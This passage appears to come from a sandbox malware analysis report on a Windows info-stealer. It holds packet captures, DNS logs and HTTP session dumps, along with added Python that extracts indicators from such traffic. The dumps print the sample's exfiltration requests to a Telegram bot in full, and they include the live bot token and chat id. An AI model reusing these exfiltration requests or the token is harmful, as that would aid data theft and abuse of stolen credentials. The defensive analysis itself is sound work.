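    sess, unmatched = attach_alerts(sessions(packets), alerts)
    rows = [(s["client_port"], s["server"], s["server_port"], s["packets"],
             round((s["last"] - s["first"]).total_seconds(), 3), [sid for sid, _ in s["alerts"]])
            for s in sess]
    return rows, unmatched


if __name__ == "__main__":
    for row in report()[0]:
        print(row)
```

On the excerpt, report() yields four sessions in order of first packet; the two to 149.154.167.220:443 (client ports 49703 and 49704) each carry exactly one of the alerts, and the port-80 session to 104.16.185.241 and the TLS session to 172.67.196.114 carry none. Any alert that falls outside every session's lifetime is returned in the unmatched list rather than silently dropped, which is the case worth noticing when sensor and capture clocks drift apart.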
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Aug 20, 2024 11:06:28.099852085 CEST  49701        80         192.168.2.10     104.16.185.241
Aug 20, 2024 11:06:28.104830980 CEST  80           49701      104.16.185.241   192.168.2.10
Aug 20, 2024 11:06:28.104950905 CEST  49701        80         192.168.2.10     104.16.185.241
Aug 20, 2024 11:06:28.105961084 CEST  49701        80         192.168.2.10     104.16.185.241
Aug 20, 2024 11:06:28.110806942 CEST  80           49701      104.16.185.241   192.168.2.10
Aug 20, 2024 11:06:28.578788042 CEST  80           49701      104.16.185.241   192.168.2.10
Aug 20, 2024 11:06:28.626013041 CEST  49701        80         192.168.2.10     104.16.185.241
Aug 20, 2024 11:06:28.673122883 CEST  49702        443        192.168.2.10     172.67.196.114
Aug 20, 2024 11:06:28.673175097 CEST  443          49702      172.67.196.114   192.168.2.10
Aug 20, 2024 11:06:28.673235893 CEST  49702        443        192.168.2.10     172.67.196.114
Aug 20, 2024 11:06:28.680500984 CEST  49702        443        192.168.2.10     172.67.196.114
Aug 20, 2024 11:06:28.680515051 CEST  443          49702      172.67.196.114   192.168.2.10
Aug 20, 2024 11:06:29.154309988 CEST  443          49702      172.67.196.114   192.168.2.10
Aug 20, 2024 11:06:29.154390097 CEST  49702        443        192.168.2.10     172.67.196.114
Aug 20, 2024 11:06:29.159112930 CEST  49702        443        192.168.2.10     172.67.196.114
Aug 20, 2024 11:06:29.159125090 CEST  443          49702      172.67.196.114   192.168.2.10
Aug 20, 2024 11:06:29.159388065 CEST  443          49702      172.67.196.114   192.168.2.10
Aug 20, 2024 11:06:29.203398943 CEST  49702        443        192.168.2.10     172.67.196.114
Aug 20, 2024 11:06:29.244505882 CEST  443          49702      172.67.196.114   192.168.2.10
Aug 20, 2024 11:06:30.316730022 CEST  443          49702      172.67.196.114   192.168.2.10
Aug 20, 2024 11:06:30.316783905 CEST  443          49702      172.67.196.114   192.168.2.10
Aug 20, 2024 11:06:30.316840887 CEST  49702        443        192.168.2.10     172.67.196.114
Aug 20, 2024 11:06:30.318984985 CEST  49702        443        192.168.2.10     172.67.196.114
Aug 20, 2024 11:06:30.322114944 CEST  49701        80         192.168.2.10     104.16.185.241
Aug 20, 2024 11:06:30.327460051 CEST  80           49701      104.16.185.241   192.168.2.10
Aug 20, 2024 11:06:30.327549934 CEST  49701        80         192.168.2.10     104.16.185.241
Aug 20, 2024 11:06:30.330678940 CEST  49703        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:30.330718994 CEST  443          49703      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:30.330907106 CEST  49703        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:30.331521034 CEST  49703        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:30.331536055 CEST  443          49703      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:30.952286959 CEST  443          49703      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:30.952394962 CEST  49703        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:30.955701113 CEST  49703        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:30.955714941 CEST  443          49703      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:30.955981970 CEST  443          49703      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:30.957456112 CEST  49703        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:30.957485914 CEST  443          49703      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:31.130688906 CEST  443          49703      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:31.130759954 CEST  443          49703      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:31.130831003 CEST  49703        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:31.133168936 CEST  49703        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:31.140183926 CEST  49704        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:31.140214920 CEST  443          49704      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:31.140367985 CEST  49704        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:31.140721083 CEST  49704        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:31.140733004 CEST  443          49704      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:31.778604031 CEST  443          49704      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:31.780967951 CEST  49704        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:31.780994892 CEST  443          49704      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:32.063421011 CEST  443          49704      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:32.063489914 CEST  443          49704      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:32.063606024 CEST  49704        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:32.064760923 CEST  49704        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:32.220347881 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:32.220388889 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:32.220475912 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:32.225459099 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:32.225476980 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:32.842881918 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:32.847392082 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:32.847409964 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.146203041 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.149372101 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.149384975 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.150443077 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.150449038 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.150597095 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.150615931 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.150712967 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.150732994 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.150799990 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.150813103 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.150887966 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.150899887 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.150949955 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.150962114 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.150999069 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.151010990 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.151052952 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.151065111 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.151129961 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.151138067 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.151334047 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.151340008 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.643863916 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.644038916 CEST  443          49706      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:33.644112110 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.644694090 CEST  49706        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:33.653753042 CEST  49709        443        192.168.2.10     172.67.19.24
Aug 20, 2024 11:06:33.653776884 CEST  443          49709      172.67.19.24     192.168.2.10
Aug 20, 2024 11:06:33.653879881 CEST  49709        443        192.168.2.10     172.67.19.24
Aug 20, 2024 11:06:33.654181004 CEST  49709        443        192.168.2.10     172.67.19.24
Aug 20, 2024 11:06:33.654196024 CEST  443          49709      172.67.19.24     192.168.2.10
Aug 20, 2024 11:06:34.118549109 CEST  443          49709      172.67.19.24     192.168.2.10
Aug 20, 2024 11:06:34.118633986 CEST  49709        443        192.168.2.10     172.67.19.24
Aug 20, 2024 11:06:34.121387959 CEST  49709        443        192.168.2.10     172.67.19.24
Aug 20, 2024 11:06:34.121395111 CEST  443          49709      172.67.19.24     192.168.2.10
Aug 20, 2024 11:06:34.121726990 CEST  443          49709      172.67.19.24     192.168.2.10
Aug 20, 2024 11:06:34.123985052 CEST  49709        443        192.168.2.10     172.67.19.24
Aug 20, 2024 11:06:34.164524078 CEST  443          49709      172.67.19.24     192.168.2.10
Aug 20, 2024 11:06:34.474342108 CEST  443          49709      172.67.19.24     192.168.2.10
Aug 20, 2024 11:06:34.474457979 CEST  443          49709      172.67.19.24     192.168.2.10
Aug 20, 2024 11:06:34.474631071 CEST  49709        443        192.168.2.10     172.67.19.24
Aug 20, 2024 11:06:34.482639074 CEST  49709        443        192.168.2.10     172.67.19.24
Aug 20, 2024 11:06:34.486862898 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:34.486906052 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:34.487051010 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:34.487523079 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:34.487538099 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:35.107831955 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:35.118026018 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:35.118042946 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:35.486301899 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:35.486320019 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:35.486470938 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:35.486476898 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:35.486576080 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:35.486588955 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:35.486663103 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:35.486680984 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:35.486898899 CEST  49711        443        192.168.2.10     149.154.167.220
Aug 20, 2024 11:06:35.486911058 CEST  443          49711      149.154.167.220  192.168.2.10
Aug 20, 2024 11:06:35.487219095 CEST  49711        443        192.168.2.10     149.154.167.220
                                                            Aug 20, 2024 11:06:35.487231016 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.487802982 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.487816095 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.487894058 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.487911940 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.487936974 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.487947941 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.488189936 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.488197088 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.488594055 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.488598108 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.566757917 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.610407114 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.990818977 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.991014004 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.991080999 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.992223024 CEST49711443192.168.2.10149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 20, 2024 11:06:28.003226042 CEST | 50113 | 53 | 192.168.2.10 | 1.1.1.1
Aug 20, 2024 11:06:28.011230946 CEST | 53 | 50113 | 1.1.1.1 | 192.168.2.10
Aug 20, 2024 11:06:28.086357117 CEST | 54170 | 53 | 192.168.2.10 | 1.1.1.1
Aug 20, 2024 11:06:28.093786001 CEST | 53 | 54170 | 1.1.1.1 | 192.168.2.10
Aug 20, 2024 11:06:28.645570993 CEST | 52144 | 53 | 192.168.2.10 | 1.1.1.1
Aug 20, 2024 11:06:28.672208071 CEST | 53 | 52144 | 1.1.1.1 | 192.168.2.10
Aug 20, 2024 11:06:30.322773933 CEST | 53256 | 53 | 192.168.2.10 | 1.1.1.1
Aug 20, 2024 11:06:30.329598904 CEST | 53 | 53256 | 1.1.1.1 | 192.168.2.10
Aug 20, 2024 11:06:33.645694971 CEST | 55142 | 53 | 192.168.2.10 | 1.1.1.1
Aug 20, 2024 11:06:33.652981043 CEST | 53 | 55142 | 1.1.1.1 | 192.168.2.10
Aug 20, 2024 11:06:46.986346006 CEST | 59759 | 53 | 192.168.2.10 | 1.1.1.1
Aug 20, 2024 11:06:47.229549885 CEST | 53 | 59759 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 20, 2024 11:06:28.003226042 CEST | 192.168.2.10 | 1.1.1.1 | 0xb768 | Standard query (0) | 157.184.7.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Aug 20, 2024 11:06:28.086357117 CEST | 192.168.2.10 | 1.1.1.1 | 0xa015 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:28.645570993 CEST | 192.168.2.10 | 1.1.1.1 | 0x5f57 | Standard query (0) | api.mylnikov.org | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:30.322773933 CEST | 192.168.2.10 | 1.1.1.1 | 0x75f9 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:33.645694971 CEST | 192.168.2.10 | 1.1.1.1 | 0x3d4f | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:46.986346006 CEST | 192.168.2.10 | 1.1.1.1 | 0xd493 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 20, 2024 11:06:28.011230946 CEST | 1.1.1.1 | 192.168.2.10 | 0xb768 | Name error (3) | 157.184.7.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Aug 20, 2024 11:06:28.093786001 CEST | 1.1.1.1 | 192.168.2.10 | 0xa015 | No error (0) | icanhazip.com |  | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:28.093786001 CEST | 1.1.1.1 | 192.168.2.10 | 0xa015 | No error (0) | icanhazip.com |  | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:28.672208071 CEST | 1.1.1.1 | 192.168.2.10 | 0x5f57 | No error (0) | api.mylnikov.org |  | 172.67.196.114 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:28.672208071 CEST | 1.1.1.1 | 192.168.2.10 | 0x5f57 | No error (0) | api.mylnikov.org |  | 104.21.44.66 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:30.329598904 CEST | 1.1.1.1 | 192.168.2.10 | 0x75f9 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:33.652981043 CEST | 1.1.1.1 | 192.168.2.10 | 0x3d4f | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:33.652981043 CEST | 1.1.1.1 | 192.168.2.10 | 0x3d4f | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:33.652981043 CEST | 1.1.1.1 | 192.168.2.10 | 0x3d4f | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:47.229549885 CEST | 1.1.1.1 | 192.168.2.10 | 0xd493 | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:47.229549885 CEST | 1.1.1.1 | 192.168.2.10 | 0xd493 | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Aug 20, 2024 11:06:47.229549885 CEST | 1.1.1.1 | 192.168.2.10 | 0xd493 | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
                                                            • api.mylnikov.org
                                                            • api.telegram.org
                                                            • pastebin.com
                                                            • icanhazip.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49701 | 104.16.185.241 | 80 | 8020 | C:\Users\user\Desktop\vYz1Z2heor.exe
Timestamp | Bytes transferred | Direction | Data
Aug 20, 2024 11:06:28.105961084 CEST | 63 | OUT | GET / HTTP/1.1
                                                            Host: icanhazip.com
                                                            Connection: Keep-Alive
Aug 20, 2024 11:06:28.578788042 CEST | 534 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 20 Aug 2024 09:06:28 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 12
                                                            Connection: keep-alive
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET
                                                            Set-Cookie: __cf_bm=gECSoH4acM6O38AkPgYxXstMkzyZ_d7nmLbfrdV.uQ4-1724144788-1.0.1.1-Ll0aZFW4hlLQzXtYT.Vk97iD0oL0oAR02DCbhYPEgWTgbkMkMfM6N94aDa96A_PWCytuiy4d8yuW.PfFr6.Sjw; path=/; expires=Tue, 20-Aug-24 09:36:28 GMT; domain=.icanhazip.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 8b613a4039974319-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                            Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49702 | 172.67.196.114 | 443 | 8020 | C:\Users\user\Desktop\vYz1Z2heor.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-20 09:06:29 UTC | 112 | OUT | GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                            Host: api.mylnikov.org
                                                            Connection: Keep-Alive
2024-08-20 09:06:30 UTC | 785 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 20 Aug 2024 09:06:30 GMT
                                                            Content-Type: application/json; charset=utf8
                                                            Content-Length: 88
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: max-age=2678400
                                                            CF-Cache-Status: MISS
                                                            Last-Modified: Tue, 20 Aug 2024 09:06:30 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCXzkN%2BWdg7nvFj%2FfWW0Mk7VHxEUObRIPVoqwL0C3tcQDQ1rR1tOeom%2BHdygrqP5mt5FksoZbSgI1hYCxc2KK8MKO6%2FG%2FR4YSwDF2AYgZ3X%2Ftta58jRhqD3QWyGRmadf3aTm"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=0; preload
                                                            X-Content-Type-Options: nosniff
                                                            Server: cloudflare
                                                            CF-RAY: 8b613a44d87c0f7d-EWR
                                                            alt-svc: h3=":443"; ma=86400
2024-08-20 09:06:30 UTC | 88 | IN | Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 34 31 34 34 37 39 30 7d
                                                            Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1724144790}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49703 | 149.154.167.220 | 443 | 8020 | C:\Users\user\Desktop\vYz1Z2heor.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-20 09:06:30 UTC | 1722 | OUT | GET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20 [TRUNCATED]
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
2024-08-20 09:06:31 UTC | 347 | IN | HTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 20 Aug 2024 09:06:31 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 137
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-20 09:06:31 UTC | 137 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 37 22 7d
                                                            Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 917"}
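The sessions above give the sample's network profile in order: an IP-echo request to icanhazip.com, a BSSID lookup against api.mylnikov.org to geolocate the host, then the Telegram Bot API with the bot token sitting in the URL path and the chat id in the query string; the DNS answers already show pastebin.com as the next destination. The following is an added example, not code from the report or from the sample: it classifies request lines of that shape and pulls out the bot id, token, chat id and paste id as indicators. The request list is constructed to mirror the report's hosts and paths; the bot id, token and chat_id in it are placeholders, and the IP-echo host list beyond icanhazip.com is an assumption.

```python
"""
Added example (not part of the Joe Sandbox report): classify HTTP request lines like the ones
the sandbox recorded and extract the indicators a responder would block or hunt for.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# The Telegram Bot API carries the bot credential in the URL path: /bot<bot_id>:<token>/<method>.
# Whoever can read the request (proxy, sandbox, EDR) holds a reusable token.
TELEGRAM_BOT_PATH = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]{30,45})/(?P<method>[A-Za-z]+)$")
# pastebin.com/raw/<id> is where the sample went right after the upload.
PASTEBIN_RAW = re.compile(r"^/raw/(?P<paste_id>[A-Za-z0-9]{8})$")
# Assumption: a short list of IP-echo services; the report itself only shows icanhazip.com.
EXTERNAL_IP_SERVICES = {"icanhazip.com", "api.ipify.org", "ifconfig.me"}

# Constructed sample, (host, method, path) in the order the sandbox saw them. Hosts and paths
# follow the report; the bot id, token and chat_id are placeholders, not the real ones.
SAMPLE_REQUESTS = [
    ("icanhazip.com", "GET", "/"),
    ("api.mylnikov.org", "GET", "/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15"),
    ("api.telegram.org", "GET",
     "/bot1234567890:AAExampleTokenNotRealXXXXXXXXXXXXXX/sendMessage?chat_id=1111111111&text=hello"),
    ("api.telegram.org", "POST",
     "/bot1234567890:AAExampleTokenNotRealXXXXXXXXXXXXXX/sendDocument?chat_id=1111111111"),
    ("pastebin.com", "GET", "/raw/AbCdEfGh"),
    ("example.org", "GET", "/index.html"),  # benign control line, should yield nothing
]


@dataclass
class Finding:
    category: str
    host: str
    detail: str
    attrs: dict = field(default_factory=dict)


def classify_request(host: str, method: str, path: str) -> list:
    """Return the findings for one request line (empty list when nothing matches)."""
    parts = urlsplit(path)
    query = parse_qs(parts.query)
    findings = []
    if host == "api.telegram.org":
        m = TELEGRAM_BOT_PATH.match(parts.path)
        if m:
            attrs = {"bot_id": m["bot_id"], "token": m["token"], "method": m["method"],
                     "chat_id": query.get("chat_id", [""])[0]}
            findings.append(Finding("telegram_bot_c2", host,
                                    f"{method} {attrs['method']} chat_id={attrs['chat_id']}", attrs))
            if attrs["method"] == "sendDocument":  # file upload, i.e. the exfil step
                findings.append(Finding("exfil_upload", host, "file upload via sendDocument", attrs))
    elif host == "pastebin.com":
        m = PASTEBIN_RAW.match(parts.path)
        if m:
            findings.append(Finding("paste_fetch", host, f"raw paste {m['paste_id']}",
                                    {"paste_id": m["paste_id"]}))
    elif host in EXTERNAL_IP_SERVICES:
        findings.append(Finding("external_ip_lookup", host, f"{method} {path}"))
    elif host == "api.mylnikov.org" and parts.path == "/geolocation/wifi" and "bssid" in query:
        findings.append(Finding("bssid_geolocation", host, f"bssid={query['bssid'][0]}",
                                {"bssid": query["bssid"][0]}))
    return findings


def triage(requests) -> dict:
    """Aggregate findings over many request lines into an indicator summary."""
    summary = {"findings": [], "categories": Counter(),
               "telegram_credentials": set(), "chat_ids": set()}
    for host, method, path in requests:
        for f in classify_request(host, method, path):
            summary["findings"].append(f)
            summary["categories"][f.category] += 1
            if f.category == "telegram_bot_c2":
                summary["telegram_credentials"].add((f.attrs["bot_id"], f.attrs["token"]))
                summary["chat_ids"].add(f.attrs["chat_id"])
    return summary


if __name__ == "__main__":
    result = triage(SAMPLE_REQUESTS)
    for f in result["findings"]:
        print(f"{f.category:20} {f.host:18} {f.detail}")
    print("Telegram credentials:", result["telegram_credentials"])
    print("Chat ids:", result["chat_ids"])
```

The token is a live credential for the attacker's bot, so a capture that contains it needs the same handling as any other secret; the paste id and chat id are the stable indicators to share.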


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49704 | 149.154.167.220 | 443 | 8020 | C:\Users\user\Desktop\vYz1Z2heor.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-20 09:06:31 UTC | 171 | OUT | GET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                            Host: api.telegram.org
2024-08-20 09:06:32 UTC | 388 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 20 Aug 2024 09:06:31 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 279
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
